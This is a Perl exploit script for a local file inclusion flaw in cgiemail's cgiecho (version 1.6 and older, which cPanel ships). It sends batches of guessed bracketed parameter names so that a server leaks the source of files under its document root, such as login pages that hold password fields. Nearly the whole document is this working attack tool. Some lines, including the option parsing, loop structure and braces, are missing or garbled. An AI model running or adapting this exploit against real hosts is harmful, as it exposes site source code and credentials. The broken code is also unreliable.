#!/usr/bin/env perl
# Exploit Title:cgiemail local file inclusion
# Vendor Homepage:http://web.mit.edu/wwwdev/cgiemail/webmaster.html
# Software Link:http://web.mit.edu/wwwdev/cgiemail/cgiemail-1.6.tar.gz
# Version:1.6 and older
# Date: 2016-09-27
# cgiecho a script included with cgiemail will return any file under a
# websites document root if the file contains square brackets and the text
# within the brackets is guessable.
# cgiemail is currently shipped with cPanel and is enabled by default.
# Example: http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']
#will display http://hostname/login.php if login.php contains $_POST['pass']
# cgiemail local file inclusion exploit
# Author: Finbar Crago <finbar.crago@gmail.com>
# https://github.com/finbar-crago/cgiemail-exploit
use strict;
use warnings;
use POSIX;
use LWP::UserAgent;
use HTML::Entities;
use Getopt::Long;
$|++; $\="\n"; $,=" ";
sub usage {
die <<"EOF";
cgiemail local file inclusion exploit
Usage: $0 [options] target
--names Check for names in commer separated list
--num Check for numbers
--num-max Maximum number to check (default 10)
--batch Number of arguments sent per request (default 10)
--cgiecho-pathPath of cgiecho on server (default '/cgi-sys/cgiecho/')
--user-agentSet user-agent (default 'Mozilla/5.0')
--deley Pause between requests in seconds (default 1)
--timeout Set connection timeout (default 10)
$0 --num --names 'email,password' http://hostname/login.php > login.php
my $names;
my $num = 0;
my $num_max = 10;
my $batch = 10;
my $cgiecho_path = '/cgi-sys/cgiecho';
my $user_agent = 'Mozilla/5.0';
my $timeout = 10;
my $deley = 1;
'names=s'=> \$names,
'num'=> \$num,
'num-max=i'=> \$num_max,
'batch=i'=> \$batch,
'cgiecho-path' => \$cgiecho_path,
'user-agent=s' => \$user_agent,
'deley=i'=> \$deley,
'timeout=i'=> \$timeout,
usage unless
defined $ARGV[0] &&
$ARGV[0] =~ m|^(https?://)?([a-z\d.-]+)/?(.*)?|i;
my $conn=$1||'http://';my $host=$2;my $path=$3||'index.php';
my $url = "$conn$host/$cgiecho_path/$path";
my @list= ();
if($num){ push @list, $_ for 0..$num_max }
push @list, "%22$_%22","%27$_%27" for split/,/,$names;
my $ua = LWP::UserAgent->new;
my $i=0;
my $end = ceil($#list/$batch);
my $args='?';
my $to = ($#list > $batch)?$batch:$#list;
$args.="$_=[$_]&" for @list[0..$to];
@list = @list[$to+1..$#list];
my $res = $ua->get($url.$args);
die $res->status_line if !$res->content_is_html;
my $html = $res->decoded_content;
if($html !~ />cgiemail[\n\r ]*([\d.]+)/){
print "cgiemail not found"if !$i;
print "cgiemail was here but now it's not..." if $i;
exit -1;
} print STDERR "detected cgiemail $1" if !$i;
print STDERR "\e[Jrequest ".++$i." of $end...";
if($res->code == 200){
$html =~ m|<PRE>(.+)</PRE>|s;
print decode_entities($1);
print STDERR "success!";
if($res->code == 500){
if($html =~ m|500 Could not open template - No such file or directory|){
print STDERR "the file /$path doesn't exist...";
elsif($html =~ m|500 Empty template file|){
print STDERR "/$path is a directory...";
print STDERR "unknown 500 error:";
print STDERR $html;
exit -1;
select(undef,undef,undef,$deley); printf "\eM";
print STDERR "sorry, no match found for $path";
exit -1;